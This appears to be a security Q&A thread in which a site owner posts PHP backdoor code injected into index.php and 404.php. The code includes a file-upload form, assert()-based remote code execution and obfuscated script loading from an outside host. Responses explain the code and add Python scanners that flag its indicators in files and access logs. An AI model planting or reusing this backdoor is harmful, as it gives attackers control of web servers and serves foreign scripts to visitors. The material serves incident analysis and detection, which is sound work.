
Here is the code injected into index.php:

// Comments added for readability; the injected code itself is unchanged.
if(@isset($_GET[bots])){                      // ?bots  -> serve a file-upload form
    echo '<form action="" method="post" enctype="multipart/form-data" name="silence" id="silence">';
    echo '<input type="file" name="file"><input name="golden" type="submit" id="golden" value="Done"></form>';
    if($_POST['golden']=="Done"){
        // Copies the uploaded temp file into the current directory under its
        // original, client-supplied name: arbitrary file upload (e.g. a .php shell).
        if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){
            echo'+';                          // '+' = upload succeeded, '-' = failed
        }else{
            echo'-';
        }
    }
// ?bot=<code> (GET, POST or cookie): on PHP before 8.0, assert() on a string
// evaluates it as PHP code when assertions are enabled, i.e. remote code execution.
}elseif(isset($_REQUEST['bot']))assert(stripslashes($_REQUEST[bot]));
else exit;                                    // any other request stops the script here

and here is the code injected into 404.php:

// Comments added for readability; the injected code itself is unchanged.
@ini_set('display_errors','off');   // silence every notice/warning the code below raises
@ini_set('log_errors',0);
@ini_set('error_log',NULL); error_reporting(0);
@ini_set('set_time_limit',0);       // not a real ini directive; has no effect
ignore_user_abort(true);
// Upload backdoor: a POST with fields "size" and "img" writes the uploaded file
// to $size.$open_image. "size" is an attacker-controlled path prefix, so the file
// can land anywhere the web server user may write (e.g. size=../../).
if(@isset($_POST['size']) and @isset($_FILES['img']['name'])) {
    @ini_set('upload_max_filesize','1000000');   // no effect: this setting cannot be changed at runtime
    $size=$_POST['size'];
    $open_image=$_FILES['img']['name'];
    $open_image_tmp=$_FILES['img']['tmp_name']; 
    $image_tmp=$size.$open_image;
    @move_uploaded_file($open_image_tmp,$image_tmp);
    echo "<!-- 404-NOT-FOUND-IMG -->";           // success marker for the attacker's client
} else echo "<!-- 404-NOT-FOUND-ERROR -->";
// For visitors whose User-Agent does not look like a search-engine crawler, load a
// script from a third-party host. Note the loose ==: stripos() returning 0 (match
// at offset 0) compares equal to false, so such a match counts as "not found".
$http_report_user = $_SERVER['HTTP_USER_AGENT'];
if ( @stripos ( $http_report_user, 'bot' ) == false and @stripos ( $http_report_user, 'google' ) == false and @stripos ( $http_report_user, 'yandex' ) == false and @stripos ( $http_report_user, 'slurp' ) == false and @stripos ( $http_report_user, 'yahoo' ) == false and @stripos ( $http_report_user, 'msn' ) == false and @stripos ( $http_report_user, 'bing' ) == false ) {
    $http_report = strtolower ( $_SERVER['HTTP_HOST'] );
    $wordpress_report = strrev ('=ecruos&wordpress?/moc.yadot-syasse//:ptth');   // reversed: http://essays-today.com/?sserpdrow&source=
    $not_found_report = strrev ('=drowyek&');                                     // reversed: &keyword=
    $not_found_page=str_ireplace('/','',$_SERVER['REQUEST_URI']);                 // requested path, slashes stripped
    $not_found_page=str_ireplace('-',' ',$not_found_page);                        // dashes become spaces
    // Emits: <script src="http://essays-today.com/?sserpdrow&source=<your host>&keyword=<requested page>">
    echo '<nofollow><noindex><script src="'.$wordpress_report.$http_report.$not_found_report.$not_found_page.'"></script></noindex></nofollow>';
}?>

Please help me find where it started or the backdoor used to inject such malicious code. Also, can somebody tell me what that code does?

schroeder
Romeo M
  • OK, I am checking the link you have given me to better understand what happened to my site – Romeo M Aug 08 '18 at 09:31
    No one can tell you how they added the code by looking at the code itself. That's like asking how someone broke into a house by looking at a book they left behind. – schroeder Aug 08 '18 at 12:00
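
As an added example (not part of the question or its answers), the following script shows how to triage files like the two posted above: it flags the indicators present in the injected code (assert() fed from request data, copy()/move_uploaded_file() of uploaded temp files, runtime error suppression, strrev()-obfuscated literals), decodes the reversed strings, and rebuilds the script URL that 404.php emits for a given host and request path. The PHP sample embedded in it is constructed from the posted fragments; the regexes are illustrative indicators for this family of injection, not a complete webshell signature set.

```python
"""Static triage for the injected index.php / 404.php code (added example)."""
import re

# Constructed sample: the relevant fragments of the posted injected code.
SAMPLE_PHP = r"""<?php
if(@isset($_GET[bots])){
    if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){ echo'+'; }
}elseif(isset($_REQUEST['bot']))assert(stripslashes($_REQUEST[bot]));
@ini_set('display_errors','off');
@move_uploaded_file($open_image_tmp,$image_tmp);
$wordpress_report = strrev ('=ecruos&wordpress?/moc.yadot-syasse//:ptth');
$not_found_report = strrev ('=drowyek&');
"""

# Indicator name -> regex applied to each source line (illustrative, not exhaustive).
INDICATORS = {
    # assert() on a string runs it as PHP code before PHP 8.0, so assert()
    # fed from request data is a code-execution backdoor.
    "assert_on_request_data": re.compile(
        r"\bassert\s*\([^;]*\$_(?:REQUEST|GET|POST|COOKIE)\b"),
    # copy()/move_uploaded_file() straight from the upload temp file to a
    # client-chosen name: arbitrary file write.
    "upload_to_original_name": re.compile(
        r"\b(?:copy|move_uploaded_file)\s*\([^;]*tmp_name"),
    "upload_handler": re.compile(r"\bmove_uploaded_file\s*\("),
    # Runtime error suppression hides the notices this sloppy code raises.
    "error_suppression": re.compile(
        r"ini_set\s*\(\s*['\"](?:display_errors|log_errors|error_log)['\"]"),
    # strrev() over a literal is the obfuscation used for the callback URL.
    "strrev_obfuscation": re.compile(r"\bstrrev\s*\(\s*['\"]"),
}

STRREV_LITERAL = re.compile(r"\bstrrev\s*\(\s*'([^']*)'\s*\)")


def decode_strrev_literals(src):
    """Return every strrev('...') literal in src, un-reversed, in file order."""
    return [m.group(1)[::-1] for m in STRREV_LITERAL.finditer(src)]


def scan_php(src):
    """Map each triggered indicator name to the 1-based line numbers hitting it."""
    hits = {}
    for lineno, line in enumerate(src.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def reconstruct_callback(host, request_uri):
    """Rebuild the <script src> the injected 404.php emits for one visitor.

    Mirrors the posted code: host lowercased, '/' stripped from the request
    URI, '-' turned into spaces, glued onto the decoded strrev() prefixes.
    The result is the outbound URL to hunt for in proxy or browser logs.
    """
    prefix, keyword = decode_strrev_literals(SAMPLE_PHP)
    page = request_uri.replace("/", "").replace("-", " ")
    return f"{prefix}{host.lower()}{keyword}{page}"


if __name__ == "__main__":
    for name, lines in sorted(scan_php(SAMPLE_PHP).items()):
        print(f"{name}: lines {lines}")
    print("decoded literals:", decode_strrev_literals(SAMPLE_PHP))
    print(reconstruct_callback("Example.COM", "/some-missing-page/"))
```

Run it over every .php file under the web root (including themes and uploads) to find other copies of the same injection; the assert() and upload indicators are the ones worth acting on first, since either gives the attacker a way back in after the visible code is removed.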

1 Answer


There's a lot of obfuscation there, but these two lines stand out:

$wordpress_report = strrev ('=ecruos&wordpress?/moc.yadot-syasse//:ptth');
$not_found_report = strrev ('=drowyek&');

It looks as though they're trying to pull a script in from that site (essays-today). Presumably, that's a compromised domain they've found and exploited, and they're including that code into your site in order to propagate.

echo '<nofollow><noindex><script src="'.$wordpress_report.$http_report.$not_found_report.$not_found_page.'"></script></noindex></nofollow>';

This line is taking the formed string in PHP, and printing it out as HTML. Note how it's doing that: the variables are all being entered into the tags inside <script>, so it's loading that compound string as a location for some JavaScript. It's going to then run that external JavaScript on your site.

Have you recently installed any new plugins to WordPress? There are several with known security issues. It might be worth installing a 404 checking plugin. Any requests that your site receives that don't link anywhere will get displayed, so any requests to insecure plugins will be displayed, along with the location the requests came from. It may not triage the situation, but it will be a good indication as to how and where you're being attacked from.

MK_Codes
  • Thank you for this information. I will try this one... I know it's hard to pinpoint where it came from (the backdoor), but it can give me clues and leads with the one you suggested. Thanks for your answer – Romeo M Aug 10 '18 at 00:14
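
As an added example (not part of the answer above), the following script does from the web server's access log what the answer suggests a 404 plugin would do, and also hunts for the two backdoors directly: requests carrying the `bots` or `bot` query parameter to index.php, POSTs to 404.php, and 404s against plugin paths, then reports the earliest hit per indicator. It assumes the Apache/nginx "combined" log format; the log lines are constructed (RFC 5737 addresses, an invented plugin path) and are not from the poster's server.

```python
"""Access-log triage for the injected index.php / 404.php backdoors (added example)."""
import re
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" log format, one request per line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Constructed sample log: RFC 5737 addresses and an invented plugin path.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Aug/2018:22:14:03 +0000] "GET /index.php?bots HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.5 - - [07/Aug/2018:22:14:09 +0000] "POST /index.php?bots HTTP/1.1" 200 1 "-" "Mozilla/5.0"
203.0.113.5 - - [07/Aug/2018:22:15:41 +0000] "GET /?bot=phpinfo%28%29%3B HTTP/1.1" 200 5122 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Aug/2018:01:02:11 +0000] "POST /404.php HTTP/1.1" 200 29 "-" "python-requests/2.19.1"
192.0.2.10 - - [08/Aug/2018:03:40:00 +0000] "GET /wp-content/plugins/example-plugin/upload.php HTTP/1.1" 404 208 "-" "Mozilla/5.0"
192.0.2.11 - - [08/Aug/2018:04:00:00 +0000] "GET /about-us/ HTTP/1.1" 200 9031 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    # keep_blank_values so a bare "?bots" (no '=') is still seen.
    entry["query"] = parse_qs(parts.query, keep_blank_values=True)
    entry["when"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return entry


def classify(entry):
    """Return the indicator tags a parsed request matches (possibly none)."""
    tags = []
    path, query = entry["path"], entry["query"]
    is_index = path == "/" or path.endswith("/index.php")
    if is_index and "bots" in query:
        tags.append("index_upload_form")      # ?bots opens the upload form
    if is_index and "bot" in query:
        tags.append("index_assert_exec")      # ?bot=<code> reaches assert()
    if path.endswith("/404.php") and entry["method"] == "POST":
        tags.append("404_upload_post")        # only a POST (size+img) does anything
    if entry["status"] == "404" and "/wp-content/plugins/" in path:
        tags.append("plugin_probe_404")       # what the 404 plugin would surface
    return tags


def triage(log_text):
    """Return one event dict per (request, tag) pair, in log order."""
    events = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for tag in classify(entry):
            events.append({"tag": tag, "ip": entry["ip"], "when": entry["when"],
                           "path": entry["path"], "ua": entry["ua"]})
    return events


def first_seen(events):
    """Earliest event per tag: the closest the log gets to 'where it started'."""
    earliest = {}
    for ev in events:
        cur = earliest.get(ev["tag"])
        if cur is None or ev["when"] < cur["when"]:
            earliest[ev["tag"]] = ev
    return earliest


if __name__ == "__main__":
    for tag, ev in sorted(first_seen(triage(SAMPLE_LOG)).items()):
        print(f"{tag:22s} first {ev['when']:%Y-%m-%d %H:%M:%S} from {ev['ip']} ({ev['ua']})")
```

Two caveats when running this against a real log: only the query string is logged, so a `bot` value sent in a POST body, and the `size`/`img` fields sent to 404.php, never appear; the lead there is the POST itself, especially from non-browser user agents. And the earliest hit only dates the first use of the backdoor, not the original entry; for that, compare the modification times of index.php and 404.php with the log around that time, as the comment above notes that the code alone cannot tell you how it got there.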